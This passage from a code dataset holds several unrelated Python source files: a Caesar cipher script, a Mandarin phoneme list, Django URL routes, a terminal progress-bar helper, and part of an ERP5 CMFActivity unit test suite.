90+1)):\n\n\t\tif n > 0:\n\t\t\tnew_ascii = new_ascii - 26\n\t\t\t\n\t\telse:\n\t\t\tnew_ascii = new_ascii + 26\n\n\treturn chr(new_ascii)\n\n\n\ndef encode():\n\tstring = input(\"Msg to be encoded: \")\n\tn = int(input(\"Caesar value: \"))\n\n\tencoded_str = \"\"\n\n\tfor char in string:\n\t\tif char.isalpha():\n\t\t\tencoded_str += cipher(char, n)\n\n\t\telse:\n\t\t\tencoded_str += char\n\t\t\n\tprint(encoded_str)\n\n\n\ndef decode():\n\tstring = input(\"Msg to be decoded: \")\n\tn = int(input(\"Caesar value: \"))*(-1)\n\n\tdecoded = \"\"\n\n\tfor char in string:\n\t\tif char.isalpha():\n\t\t\tdecoded += cipher(char, n)\n\n\t\telse:\n\t\t\tdecoded += char\n\t\t\n\tprint(decoded)\n\n\n\nif __name__ == \"__main__\":\n\tchoice = menu()\n\n\tif choice == 1:\n\t\tencode()\n\telse:\n\t\tdecode()\n\n","repo_name":"howtoosee/Mini_Projects","sub_path":"caesar.py","file_name":"caesar.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"16946103406","text":"phs = ['AP',\n 'SP',\n 'a',\n 'ai',\n 'an',\n 'ang',\n 'ao',\n 'b',\n 'c',\n 'ch',\n 'd',\n 'e',\n 'ei',\n 'en',\n 'eng',\n 'er',\n 'f',\n 'g',\n 'h',\n 'i',\n 'ia',\n 'ian',\n 'iang',\n 'iao',\n 'ie',\n 'in',\n 'ing',\n 'iong',\n 'iu',\n 'j',\n 'k',\n 'l',\n 'm',\n 'n',\n 'o',\n 'ong',\n 'ou',\n 'p',\n 'q',\n 'r',\n 's',\n 'sh',\n 't',\n 'u',\n 'ua',\n 'uai',\n 'uan',\n 'uang',\n 'ui',\n 'un',\n 'uo',\n 'v',\n 'van',\n 've',\n 'vn',\n 'w',\n 'x',\n 'y',\n 'z',\n 'zh']\n\ndef get_initials_and_finals():\n initials = []\n finals = []\n for ph in phs:\n if ph in ('AP', 'SP'):\n continue\n elif ph[0] in ('a', 'e', 'i', 'o', 'u', 'v'):\n finals.append(ph)\n else:\n initials.append(ph)\n return initials, finals","repo_name":"OmniAiOrg/SonicScribe","sub_path":"utils/ph.py","file_name":"ph.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"tg","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"1619578317","text":"from django.conf.urls import url\nfrom . import views\nfrom rest_framework.urlpatterns import format_suffix_patterns\n\nurlpatterns = [\n url(r'^$', views.IndexView.as_view(), name='index' ),\n url(r'^apiv1/forecasts', views.ForecastList.as_view()),\n url(r'^register', views.UserFormView.as_view(), name='register' ),\n url(r'^login_user/$', views.login_user, name='login_user'),\n url(r'^logout_user/$', views.logout_user, name='logout_user'),\n]","repo_name":"abrophy/weather-app","sub_path":"weather/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"15527112422","text":"\"\"\"\nUtilitary functions for displaying informations in the terminal\n\"\"\"\n\n# Standard modules\nimport os\nimport sys\nimport time\nimport operator\nimport functools\n# External modules\nimport torch\nfrom torch.nn.modules.module import _addindent\nimport torchinfo.torchinfo as torchinfo\n\ntry:\n _, term_width = os.popen('stty size', 'r').read().split()\n term_width = int(term_width)\nexcept ValueError:\n term_width = 80\n\nTOTAL_BAR_LENGTH = 65.\nlast_time = time.time()\nbegin_time = last_time\ndef progress_bar(current, total, msg=None):\n global last_time, begin_time\n if current == 0:\n begin_time = time.time() # Reset for new bar.\n\n cur_len = int(TOTAL_BAR_LENGTH*current/total)\n rest_len = int(TOTAL_BAR_LENGTH - cur_len) - 1\n\n sys.stdout.write(' [{}>{}]'.format('='*cur_len, '.'*rest_len))\n\n cur_time = time.time()\n step_time = cur_time - last_time\n last_time = cur_time\n tot_time = cur_time - begin_time\n\n L = []\n L.append(' Step: %10s' % format_time(step_time))\n L.append(' | Tot: %10s' % format_time(tot_time))\n if msg:\n L.append(' | ' + msg)\n\n msg = ''.join(L)\n sys.stdout.write(msg)\n for i in range(term_width-int(TOTAL_BAR_LENGTH)-len(msg)-3):\n sys.stdout.write(' ')\n\n # Go back to the center of the bar.\n for i in range(term_width-int(TOTAL_BAR_LENGTH/2)+2):\n sys.stdout.write('\\b')\n sys.stdout.write(' %d/%d ' % (current+1, total))\n\n if current < total-1:\n sys.stdout.write('\\r')\n else:\n sys.stdout.write('\\n')\n sys.stdout.flush()\n\ndef format_time(seconds):\n days = int(seconds / 3600/24)\n seconds = seconds - days*3600*24\n hours = int(seconds / 3600)\n seconds = seconds - hours*3600\n minutes = int(seconds / 60)\n seconds = seconds - minutes*60\n secondsf = int(seconds)\n seconds = seconds - secondsf\n millis = int(seconds*1000)\n\n f = ''\n i = 1\n if days > 0:\n f += str(days) + 'D'\n i += 1\n if hours > 0 and i <= 2:\n f += str(hours) + 'h'\n i += 1\n if minutes > 0 and i <= 2:\n f += str(minutes) + 'm'\n i += 1\n if secondsf > 0 and i <= 2:\n f += str(secondsf) + 's'\n i += 1\n if millis > 0 and i <= 2:\n f += str(millis) + 'ms'\n i += 1\n if f == '':\n f = '0ms'\n return f\n\n\ndef torch_summarize(model, input_size=None):\n \"\"\"Summarizes torch model by showing trainable parameters and weights.\"\"\"\n return torchinfo.summary(model, verbose=0, input_size=input_size)\n\ndef htmlize(txt):\n return txt.replace(' ', ' ').replace('\\n', ' \\n')\n","repo_name":"jeremyfix/deepcs","sub_path":"deepcs/display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71249237683","text":"import six\nimport inspect\nimport warnings\nfrom functools import wraps\nfrom itertools import product\nfrom AccessControl.SecurityManagement import getSecurityManager\nfrom AccessControl.SecurityManagement import setSecurityManager\nfrom AccessControl.SecurityManagement import newSecurityManager\nfrom Acquisition import aq_base, aq_parent\nfrom Products.ERP5Type.tests.utils import LogInterceptor\nfrom Testing import ZopeTestCase\nfrom Products.ERP5Type.tests.ERP5TypeTestCase import ERP5TypeTestCase\nfrom Products.ERP5Type.tests.utils import createZODBPythonScript\nfrom Products.ERP5Type.Base import Base\nfrom Products.CMFActivity import ActivityTool\nfrom Products.CMFActivity.Activity.SQLBase import INVOKE_ERROR_STATE\nfrom Products.CMFActivity.Activity.Queue import VALIDATION_ERROR_DELAY\nfrom Products.CMFActivity.Activity.SQLDict import SQLDict\nfrom Products.CMFActivity.Errors import ActivityPendingError, ActivityFlushError\nfrom Products.PluggableAuthService.PropertiedUser import PropertiedUser\nfrom erp5.portal_type import Organisation\nfrom AccessControl.SecurityManagement import newSecurityManager\nfrom zLOG import LOG\nfrom ZODB.POSException import ConflictError\nfrom DateTime import DateTime\nfrom Products.CMFActivity.ActivityTool import (\n cancelProcessShutdown, Message, getCurrentNode, getServerAddress)\nfrom MySQLdb import OperationalError\nfrom Products.ZMySQLDA.db import DB\nimport gc\nimport random\nimport threading\nimport weakref\nimport transaction\nfrom App.config import getConfiguration\nimport socket\n\nclass CommitFailed(Exception):\n pass\n\ndef for_each_activity(wrapped):\n def wrapper(self):\n getMessageList = self.portal.portal_activities.getMessageList\n for activity in ActivityTool.activity_dict:\n wrapped(self, activity)\n self.abort()\n self.assertFalse([\n x.__dict__ for x in getMessageList()\n ])\n return wraps(wrapped)(wrapper)\n\ndef registerFailingTransactionManager(*args, **kw):\n from Shared.DC.ZRDB.TM import TM\n class dummy_tm(TM):\n def tpc_vote(self, *ignored):\n raise CommitFailed\n def _finish(self):\n pass\n def _abort(self):\n pass\n dummy_tm()._register()\n\nclass LockOnce(object):\n\n def __init__(self):\n self.acquire = threading.Lock().acquire\n\n def release(self):\n pass\n\nclass TestCMFActivity(ERP5TypeTestCase, LogInterceptor):\n\n # Different variables used for this test\n company_id = 'Nexedi'\n title1 = 'title1'\n title2 = 'title2'\n company_id2 = 'Coramy'\n company_id3 = 'toto'\n\n def getTitle(self):\n return \"CMFActivity\"\n\n def getBusinessTemplateList(self):\n \"\"\"\n Return the list of business templates.\n \"\"\"\n return ('erp5_base', 'erp5_joblib')\n\n def getOrganisationModule(self):\n return self.portal.organisation_module\n\n def getOrganisation(self):\n return self.getOrganisationModule()._getOb(self.company_id)\n\n def afterSetUp(self):\n super(TestCMFActivity, self).afterSetUp()\n from Products.CMFActivity.ActivityRuntimeEnvironment import BaseMessage\n # Set 'max_retry' to a known value so that we can test the feature\n BaseMessage.max_retry = property(lambda self:\n self.activity_kw.get('max_retry', 5))\n self.login()\n # Then add new components\n organisation_module = self.getOrganisationModule()\n if not(organisation_module.hasContent(self.company_id)):\n o1 = organisation_module.newContent(id=self.company_id)\n self.tic()\n\n def tearDown(self):\n # Override ERP5 tearDown to make sure that tests do not leave unprocessed\n # activity messages. We are testing CMFActivity so it's important to check\n # that everything works as expected on this subject.\n try:\n if self._resultForDoCleanups.wasSuccessful():\n getMessageList = self.portal.portal_activities.getMessageList\n self.assertFalse(getMessageList())\n # Also check if a test drop them without committing.\n self.abort()\n self.assertFalse(getMessageList())\n finally:\n ERP5TypeTestCase.tearDown(self)\n\n def getMessageList(self, activity, **kw):\n return ActivityTool.activity_dict[activity].getMessageList(\n self.portal.portal_activities, **kw)\n\n def deleteMessageList(self, activity, message_list):\n ActivityTool.activity_dict[activity].deleteMessageList(\n self.portal.portal_activities.getSQLConnection(),\n [m.uid for m in message_list])\n self.commit()\n\n def login(self):\n uf = self.portal.acl_users\n uf._doAddUser('seb', '', ['Manager'], [])\n uf._doAddUser('ERP5TypeTestCase', '', ['Manager'], [])\n user = uf.getUserById('seb').__of__(uf)\n newSecurityManager(None, user)\n\n def ticOnce(self, *args, **kw):\n is_running_lock = ActivityTool.is_running_lock\n try:\n ActivityTool.is_running_lock = LockOnce()\n self.portal.portal_activities.tic(*args, **kw)\n finally:\n ActivityTool.is_running_lock = is_running_lock\n\n @for_each_activity\n def testInvokeAndCancelActivity(self, activity):\n \"\"\"\n Simple test where we invoke and cancel an activity\n \"\"\"\n activity_tool = self.portal.portal_activities\n organisation = self.getOrganisation()\n organisation._setTitle(self.title1)\n self.assertEqual(self.title1,organisation.getTitle())\n organisation.activate(activity=activity)._setTitle(self.title2)\n # Needed so that the message are commited into the queue\n self.commit()\n message_list = activity_tool.getMessageList()\n self.assertEqual(len(message_list),1)\n activity_tool.manageCancel(organisation.getPhysicalPath(),'_setTitle')\n # Needed so that the message are removed from the queue\n self.commit()\n self.assertEqual(self.title1,organisation.getTitle())\n message_list = activity_tool.getMessageList()\n self.assertEqual(len(message_list),0)\n organisation.activate(activity=activity)._setTitle(self.title2)\n # Needed so that the message are commited into the queue\n self.commit()\n message_list = activity_tool.getMessageList()\n self.assertEqual(len(message_list),1)\n activity_tool.manageInvoke(organisation.getPhysicalPath(),'_setTitle')\n # Needed so that the message are removed from the queue\n self.commit()\n self.assertEqual(self.title2,organisation.getTitle())\n\n @for_each_activity\n def testDeferredSetTitleActivity(self, activity):\n \"\"\"\n We check that the title is changed only after that\n the activity was called\n \"\"\"\n activity_tool = self.portal.portal_activities\n organisation = self.getOrganisation()\n organisation._setTitle(self.title1)\n self.assertEqual(self.title1,organisation.getTitle())\n organisation.activate(activity=activity)._setTitle(self.title2)\n # Needed so that the message are commited into the queue\n self.commit()\n self.assertEqual(self.title1,organisation.getTitle())\n activity_tool.tic()\n self.assertEqual(self.title2,organisation.getTitle())\n\n @for_each_activity\n def testCallOnceWithActivity(self, activity):\n \"\"\"\n With this test we can check if methods are called\n only once (sometimes it was twice !!!)\n \"\"\"\n activity_tool = self.portal.portal_activities\n def setFoobar(self):\n if hasattr(self,'foobar'):\n self.foobar = self.foobar + 1\n else:\n self.foobar = 1\n def getFoobar(self):\n return (getattr(self,'foobar',0))\n organisation = self.getOrganisation()\n Organisation.setFoobar = setFoobar\n Organisation.getFoobar = getFoobar\n organisation.foobar = 0\n organisation._setTitle(self.title1)\n self.assertEqual(0,organisation.getFoobar())\n organisation.activate(activity=activity).setFoobar()\n # Needed so that the message are commited into the queue\n self.commit()\n message_list = activity_tool.getMessageList()\n self.assertEqual(len(message_list),1)\n activity_tool.tic()\n self.assertEqual(1,organisation.getFoobar())\n message_list = activity_tool.getMessageList()\n self.assertEqual(len(message_list),0)\n organisation.activate(activity=activity).setFoobar()\n # Needed so that the message are commited into the queue\n self.commit()\n message_list = activity_tool.getMessageList()\n self.assertEqual(len(message_list),1)\n activity_tool.manageInvoke(organisation.getPhysicalPath(),'setFoobar')\n # Needed so that the message are commited into the queue\n self.commit()\n self.assertEqual(2,organisation.getFoobar())\n\n @for_each_activity\n def testTryFlushActivity(self, activity):\n \"\"\"\n Check the method flush\n \"\"\"\n organisation = self.getOrganisation()\n organisation._setTitle(self.title1)\n organisation.activate(activity=activity)._setTitle(self.title2)\n organisation.flushActivity(invoke=1)\n self.assertEqual(organisation.getTitle(),self.title2)\n self.commit()\n message_list = self.portal.portal_activities.getMessageList()\n self.assertEqual(len(message_list),0)\n self.assertEqual(organisation.getTitle(),self.title2)\n # Try again with different commit order\n organisation._setTitle(self.title1)\n organisation.activate(activity=activity)._setTitle(self.title2)\n self.commit()\n organisation.flushActivity(invoke=1)\n self.assertEqual(len(message_list),0)\n self.assertEqual(organisation.getTitle(),self.title2)\n self.commit()\n\n @for_each_activity\n def testTryActivateInsideFlush(self, activity):\n \"\"\"\n Create a new activity inside a flush action\n \"\"\"\n activity_tool = self.portal.portal_activities\n def DeferredSetTitle(self,value):\n self.activate(activity=activity)._setTitle(value)\n Organisation.DeferredSetTitle = DeferredSetTitle\n organisation = self.getOrganisation()\n organisation._setTitle(self.title1)\n organisation.activate(activity=activity).DeferredSetTitle(self.title2)\n organisation.flushActivity(invoke=1)\n self.commit()\n activity_tool.tic()\n self.commit()\n self.assertEqual(organisation.getTitle(),self.title2)\n\n @for_each_activity\n def testTryTwoMethods(self, activity):\n \"\"\"\n Try several activities\n \"\"\"\n activity_tool = self.portal.portal_activities\n def DeferredSetDescription(self,value):\n self._setDescription(value)\n def DeferredSetTitle(self,value):\n self._setTitle(value)\n Organisation.DeferredSetTitle = DeferredSetTitle\n Organisation.DeferredSetDescription = DeferredSetDescription\n organisation = self.getOrganisation()\n organisation._setTitle(None)\n organisation.setDescription(None)\n organisation.activate(activity=activity).DeferredSetTitle(self.title1)\n organisation.activate(activity=activity).DeferredSetDescription(self.title1)\n self.commit()\n activity_tool.distribute()\n activity_tool.tic()\n self.commit()\n self.assertEqual(organisation.getTitle(),self.title1)\n self.assertEqual(organisation.getDescription(),self.title1)\n self.tic()\n\n @for_each_activity\n def testTryTwoMethodsAndFlushThem(self, activity):\n \"\"\"\n make sure flush works with several activities\n \"\"\"\n activity_tool = self.portal.portal_activities\n def DeferredSetTitle(self,value):\n self.activate(activity=activity)._setTitle(value)\n def DeferredSetDescription(self,value):\n self.activate(activity=activity)._setDescription(value)\n Organisation.DeferredSetTitle = DeferredSetTitle\n Organisation.DeferredSetDescription = DeferredSetDescription\n organisation = self.getOrganisation()\n organisation._setTitle(None)\n organisation.setDescription(None)\n organisation.activate(activity=activity).DeferredSetTitle(self.title1)\n organisation.activate(activity=activity).DeferredSetDescription(self.title1)\n organisation.flushActivity(invoke=1)\n self.commit()\n activity_tool.distribute()\n activity_tool.tic()\n self.commit()\n self.assertEqual(organisation.getTitle(),self.title1)\n self.assertEqual(organisation.getDescription(),self.title1)\n\n def TryActivateFlushActivateTic(self, activity,second=None,commit_sub=0):\n \"\"\"\n try to commit sub transactions\n \"\"\"\n activity_tool = self.portal.portal_activities\n def DeferredSetTitle(self,value,commit_sub=0):\n if commit_sub:\n transaction.savepoint(optimistic=True)\n self.activate(activity=second or activity,priority=4)._setTitle(value)\n def DeferredSetDescription(self,value,commit_sub=0):\n if commit_sub:\n transaction.savepoint(optimistic=True)\n self.activate(activity=second or activity,priority=4)._setDescription(value)\n Organisation.DeferredSetTitle = DeferredSetTitle\n Organisation.DeferredSetDescription = DeferredSetDescription\n organisation = self.getOrganisation()\n organisation._setTitle(None)\n organisation.setDescription(None)\n organisation.activate(activity=activity).DeferredSetTitle(self.title1,commit_sub=commit_sub)\n organisation.flushActivity(invoke=1)\n organisation.activate(activity=activity).DeferredSetDescription(self.title1,commit_sub=commit_sub)\n self.commit()\n activity_tool.distribute()\n activity_tool.tic()\n self.commit()\n self.assertEqual(organisation.getTitle(),self.title1)\n self.assertEqual(organisation.getDescription(),self.title1)\n\n @for_each_activity\n def testTryMessageWithErrorOnActivity(self, activity):\n \"\"\"\n Make sure that message with errors are not deleted\n \"\"\"\n activity_tool = self.portal.portal_activities\n def crashThisActivity(self):\n self.IWillCrash()\n organisation = self.getOrganisation()\n Organisation.crashThisActivity = crashThisActivity\n organisation.activate(activity=activity).crashThisActivity()\n # Needed so that the message are commited into the queue\n self.commit()\n message_list = activity_tool.getMessageList()\n LOG('Before MessageWithErrorOnActivityFails, message_list',0,[x.__dict__ for x in message_list])\n self.assertEqual(len(message_list),1)\n activity_tool.tic()\n # XXX HERE WE SHOULD USE TIME SHIFT IN ORDER TO SIMULATE MULTIPLE TICS\n # Test if there is still the message after it crashed\n message_list = activity_tool.getMessageList()\n self.assertEqual(len(message_list),1)\n activity_tool.manageCancel(organisation.getPhysicalPath(),'crashThisActivity')\n # Needed so that the message are commited into the queue\n self.commit()\n\n @for_each_activity\n def testDeferredSetTitleWithRenamedObject(self, activity):\n \"\"\"\n make sure that it is impossible to rename an object\n if some activities are still waiting for this object\n \"\"\"\n organisation = self.getOrganisation()\n organisation._setTitle(self.title1)\n self.assertEqual(self.title1,organisation.getTitle())\n organisation.activate(activity=activity)._setTitle(self.title2)\n # Needed so that the message are commited into the queue\n self.commit()\n self.assertEqual(self.title1,organisation.getTitle())\n self.assertRaises(ActivityPendingError,organisation.edit,id=self.company_id2)\n self.portal.portal_activities.tic()\n\n def TryActiveProcess(self, activity):\n \"\"\"\n Try to store the result inside an active process\n \"\"\"\n activity_tool = self.portal.portal_activities\n organisation = self.getOrganisation()\n organisation._setTitle(self.title1)\n active_process = activity_tool.newActiveProcess()\n self.assertEqual(self.title1,organisation.getTitle())\n organisation.activate(activity=activity,active_process=active_process).getTitle()\n # Needed so that the message are commited into the queue\n self.commit()\n activity_tool.distribute()\n activity_tool.tic()\n self.assertEqual(self.title1,organisation.getTitle())\n result = active_process.getResultList()[0]\n self.assertEqual(result.method_id , 'getTitle')\n self.assertEqual(result.result , self.title1)\n # Execute any further activity which may have been spawned by activity\n # execution (ex: fulltext indeation of the active process).\n self.tic()\n\n def TryActiveProcessWithResultDict(self, activity):\n \"\"\"\n Try to store the result inside an active process using result list\n \"\"\"\n activity_tool = self.portal.portal_activities\n organisation = self.getOrganisation()\n organisation._setTitle(self.title1)\n active_process = activity_tool.newActiveProcess()\n self.assertEqual(self.title1,organisation.getTitle())\n\n # Post SQLjoblib tasks with explicit signature\n organisation.activate(activity=activity,active_process=active_process, signature=1).getTitle()\n organisation.activate(activity=activity,active_process=active_process, signature=2).getTitle()\n organisation.activate(activity=activity,active_process=active_process, signature=3).getTitle()\n\n self.commit()\n activity_tool.distribute()\n activity_tool.tic()\n result_dict = active_process.getResultDict()\n result = result_dict[1]\n self.assertEqual(result_dict[1].method_id, 'getTitle')\n self.assertEqual(result.result , self.title1)\n result = result_dict[2]\n self.assertEqual(result_dict[2].method_id, 'getTitle')\n self.assertEqual(result.result , self.title1)\n result = result_dict[3]\n self.assertEqual(result_dict[3].method_id, 'getTitle')\n self.assertEqual(result.result , self.title1)\n # Execute any further activity which may have been spawned by activity\n # execution (ex: fulltext indeation of the active process).\n self.tic()\n\n @for_each_activity\n def testTryMethodAfterMethod(self, activity):\n \"\"\"\n Ensure the order of an execution by a method id\n \"\"\"\n o = self.getOrganisation()\n\n o.setTitle('a')\n self.assertEqual(o.getTitle(), 'a')\n self.tic()\n\n def toto(self, value):\n self.setTitle(self.getTitle() + value)\n o.__class__.toto = toto\n\n def titi(self, value):\n self.setTitle(self.getTitle() + value)\n o.__class__.titi = titi\n\n o.activate(after_method_id = 'titi', activity = activity).toto('b')\n o.activate(activity = activity).titi('c')\n self.tic()\n self.assertEqual(o.getTitle(), 'acb')\n\n @for_each_activity\n def testTryAfterTag(self, activity):\n \"\"\"\n Ensure the order of an execution by a tag\n \"\"\"\n o = self.getOrganisation()\n\n o.setTitle('?')\n self.assertEqual(o.getTitle(), '?')\n self.tic()\n\n o.activate(after_tag = 'toto', activity = activity).setTitle('b')\n o.activate(tag = 'toto', activity = activity).setTitle('a')\n self.tic()\n self.assertEqual(o.getTitle(), 'b')\n\n o.setDefaultActivateParameterDict({'tag': 'toto'})\n def titi(self):\n self.setCorporateName(self.getTitle() + 'd')\n o.__class__.titi = titi\n o.activate(after_tag_and_method_id=('toto', 'setTitle'), activity = activity).titi()\n o.activate(activity = activity).setTitle('c')\n self.tic()\n self.assertEqual(o.getCorporateName(), 'cd')\n\n @for_each_activity\n def testTryFlushActivityWithAfterTag(self, activity):\n \"\"\"\n Ensure the order of an execution by a tag\n \"\"\"\n o = self.getOrganisation()\n\n o.setTitle('?')\n o.setDescription('?')\n self.assertEqual(o.getTitle(), '?')\n self.assertEqual(o.getDescription(), '?')\n self.tic()\n\n o.activate(after_tag = 'toto', activity = activity).setDescription('b')\n o.activate(tag = 'toto', activity = activity).setTitle('a')\n self.commit()\n tool = self.getActivityTool()\n self.assertRaises(ActivityFlushError,tool.manageInvoke,o.getPath(),'setDescription')\n tool.manageInvoke(o.getPath(),'setTitle')\n self.commit()\n self.assertEqual(o.getTitle(), 'a')\n self.assertEqual(o.getDescription(), '?')\n self.tic()\n self.assertEqual(o.getTitle(), 'a')\n self.assertEqual(o.getDescription(), 'b')\n\n @for_each_activity\n def testScheduling(self, activity):\n \"\"\"\n Check if active objects with different after parameters are executed in a correct order\n \"\"\"\n o = self.getOrganisation()\n\n o.setTitle('?')\n self.assertEqual(o.getTitle(), '?')\n self.tic()\n\n def toto(self, s):\n self.setTitle(self.getTitle() + s)\n o.__class__.toto = toto\n\n o.activate(tag = 'toto', activity = activity).toto('a')\n self.commit()\n o.activate(after_tag = 'titi', activity = activity).toto('b')\n self.commit()\n o.activate(tag = 'titi', after_tag = 'toto', activity = activity).setTitle('c')\n self.tic()\n self.assertEqual(o.getTitle(), 'cb')\n\n @for_each_activity\n def testSchedulingAfterTagList(self, activity):\n \"\"\"\n Check if active objects with different after parameters are executed in a\n correct order, when after_tag is passed as a list\n \"\"\"\n o = self.getOrganisation()\n\n o.setTitle('')\n self.tic()\n\n def toto(self, s):\n self.setTitle(self.getTitle() + s)\n o.__class__.toto = toto\n\n o.activate(tag='A', activity=activity).toto('a')\n self.commit()\n o.activate(tag='B', activity=activity).toto('b')\n self.commit()\n o.activate(after_tag=('A', 'B'), activity=activity).setTitle('last')\n self.tic()\n self.assertEqual(o.getTitle(), 'last')\n\n @for_each_activity\n def testCheckCountMessageWithTag(self, activity):\n \"\"\"\n Check countMessageWithTag function.\n \"\"\"\n activity_tool = self.portal.portal_activities\n o = self.getOrganisation()\n o.setTitle('?')\n self.tic()\n\n o.activate(tag = 'toto', activity = activity).setTitle('a')\n self.commit()\n self.assertEqual(o.getTitle(), '?')\n self.assertEqual(activity_tool.countMessageWithTag('toto'), 1)\n self.tic()\n self.assertEqual(o.getTitle(), 'a')\n self.assertEqual(activity_tool.countMessageWithTag('toto'), 0)\n\n def testTryErrorsWhileFinishingCommitDB(self):\n \"\"\"Try to execute active objects which may throw conflict errors\n while validating, and check if they are still executed.\"\"\"\n activity_tool = self.portal.portal_activities\n\n # Monkey patch Queue to induce conflict errors artificially.\n def query(self, query_string,*args, **kw):\n # Not so nice, this is specific to zsql method\n if \"REPLACE INTO\" in query_string:\n raise OperationalError\n return self.original_query(query_string,*args, **kw)\n\n # Test some range of conflict error occurences.\n self.portal.organisation_module.reindexObject()\n self.commit()\n message, = activity_tool.getMessageList()\n try:\n DB.original_query = DB.query\n DB.query = query\n activity_tool.distribute()\n activity_tool.tic()\n self.commit()\n finally:\n DB.query = DB.original_query\n del DB.original_query\n self.deleteMessageList('SQLDict', [message])\n\n @for_each_activity\n def testIsMessageRegisteredMethod(self, activity):\n dedup = activity != 'SQLQueue'\n activity_tool = self.portal.portal_activities\n object_b = self.getOrganisation()\n object_a = object_b.getParentValue()\n def check(count):\n self.commit()\n self.assertEqual(len(activity_tool.getMessageList()), count)\n self.tic()\n # First case: creating the same activity twice must only register one\n # for queues with deduplication.\n object_a.activate(activity=activity).getId()\n object_a.activate(activity=activity).getId()\n check(1 if dedup else 2)\n # Second case: creating activity with same tag must only register one,\n # for queues with deduplication.\n # This behaviour is actually the same as the no-tag behaviour.\n object_a.activate(activity=activity, tag='foo').getId()\n object_a.activate(activity=activity, tag='foo').getId()\n check(1 if dedup else 2)\n # Third case: creating activities with different tags must register both.\n object_a.activate(activity=activity, tag='foo').getId()\n object_a.activate(activity=activity, tag='bar').getId()\n check(2)\n # Fourth case: creating activities on different objects must register\n # both.\n object_a.activate(activity=activity).getId()\n object_b.activate(activity=activity).getId()\n check(2)\n # Fifth case: creating activities with different method must register\n # both.\n object_a.activate(activity=activity).getId()\n object_a.activate(activity=activity).getTitle()\n check(2)\n\n def test_33_TryActivateFlushActivateTicWithSQLDict(self):\n # Test if we call methods only once\n self.TryActivateFlushActivateTic('SQLDict')\n\n def test_34_TryActivateFlushActivateTicWithSQLQueue(self):\n # Test if we call methods only once\n self.TryActivateFlushActivateTic('SQLQueue')\n\n def test_37_TryActivateFlushActivateTicWithMultipleActivities(self):\n # Test if we call methods only once\n self.TryActivateFlushActivateTic('SQLQueue',second='SQLDict')\n self.TryActivateFlushActivateTic('SQLDict',second='SQLQueue')\n\n def test_38_TryCommitSubTransactionWithSQLDict(self):\n # Test if we call methods only once\n self.TryActivateFlushActivateTic('SQLDict',commit_sub=1)\n\n def test_39_TryCommitSubTransactionWithSQLQueue(self):\n # Test if we call methods only once\n self.TryActivateFlushActivateTic('SQLQueue',commit_sub=1)\n\n def test_46_TryActiveProcessWithSQLDict(self):\n # Test if we call methods only once\n self.TryActiveProcess('SQLDict')\n\n def test_47_TryActiveProcessWithSQLQueue(self):\n # Test if we call methods only once\n self.TryActiveProcess('SQLQueue')\n\n def test_48_TryActiveProcessWithSQLJoblib(self):\n # Test if we call methods only once\n self.TryActiveProcessWithResultDict('SQLJoblib')\n\n def test_57_TryCallActivityWithRightUser(self):\n # Test if me execute methods with the right user\n # This should be independant of the activity used\n # We are first logged as seb\n activity_tool = self.portal.portal_activities\n organisation = self.getOrganisation()\n # Add new user toto\n uf = self.portal.acl_users\n uf._doAddUser('toto', '', ['Manager'], [])\n user = uf.getUserById('toto').__of__(uf)\n newSecurityManager(None, user)\n # Execute something as toto\n organisation.activate().newContent(portal_type='Email',id='email')\n # Then execute activities as seb\n user = uf.getUserById('seb').__of__(uf)\n newSecurityManager(None, user)\n self.tic()\n email = organisation.get('email')\n # Check if what we did was executed as toto\n self.assertEqual(email.getOwnerInfo()['id'],'toto')\n\n def flushAllActivities(self, silent=0, loop_size=1000):\n \"\"\"Executes all messages until the queue only contains failed\n messages.\n \"\"\"\n activity_tool = self.portal.portal_activities\n for _ in xrange(loop_size):\n activity_tool.distribute(node_count=1)\n activity_tool.tic(processing_node=1)\n\n finished = all(message.processing_node == INVOKE_ERROR_STATE\n for message in activity_tool.getMessageList())\n\n activity_tool.timeShift(3 * VALIDATION_ERROR_DELAY)\n self.commit()\n if finished:\n return\n if not silent:\n self.fail('flushAllActivities maximum loop count reached')\n\n def test_68_TestMessageValidationAndFailedActivities(self):\n \"\"\"after_method_id and failed activities.\n\n Tests that if we have an active method scheduled by\n after_method_id and a failed activity with this method id, the\n method is NOT executed.\n\n Note: earlier version of this test checked exactly the contrary, but it\n was eventually agreed that this was a bug. If an activity fails, all the\n activities that depend on it should be block until the first one is\n resolved.\"\"\"\n activity_tool = self.portal.portal_activities\n original_title = 'something'\n obj = self.portal.organisation_module.newContent(\n portal_type='Organisation',\n title=original_title)\n # Monkey patch Organisation to add a failing method\n def failingMethod(self):\n raise ValueError('This method always fail')\n Organisation.failingMethod = failingMethod\n\n for activity in ActivityTool.activity_dict:\n # reset\n activity_tool.manageClearActivities()\n obj.setTitle(original_title)\n self.commit()\n\n # activate failing message and flush\n for fail_activity in ActivityTool.activity_dict:\n obj.activate(activity = fail_activity).failingMethod()\n self.commit()\n self.flushAllActivities(silent=1, loop_size=100)\n full_message_list = activity_tool.getMessageList()\n remaining_messages = [a for a in full_message_list if a.method_id !=\n 'failingMethod']\n if len(full_message_list) != 3:\n self.fail('failingMethod should not have been flushed')\n if len(remaining_messages) != 0:\n self.fail('Activity tool should have no other remaining messages')\n\n # activate our message\n new_title = 'nothing'\n obj.activate(after_method_id = ['failingMethod'],\n activity = activity ).setTitle(new_title)\n self.commit()\n self.flushAllActivities(silent=1, loop_size=100)\n full_message_list = activity_tool.getMessageList()\n remaining_messages = [a for a in full_message_list if a.method_id !=\n 'failingMethod']\n self.assertEqual(len(full_message_list), 4,\n 'failingMethod should not have been flushed')\n self.assertEqual(len(remaining_messages), 1,\n 'Activity tool should have one blocked setTitle activity')\n self.assertEqual(remaining_messages[0].activity_kw['after_method_id'],\n ['failingMethod'])\n self.assertEqual(obj.getTitle(), original_title)\n\n activity_tool.manageClearActivities()\n self.commit()\n\n def test_70_TestCancelFailedActiveObject(self):\n \"\"\"Cancel an active object to make sure that it does not refer to\n a persistent object.\n \"\"\"\n activity_tool = self.portal.portal_activities\n\n original_title = 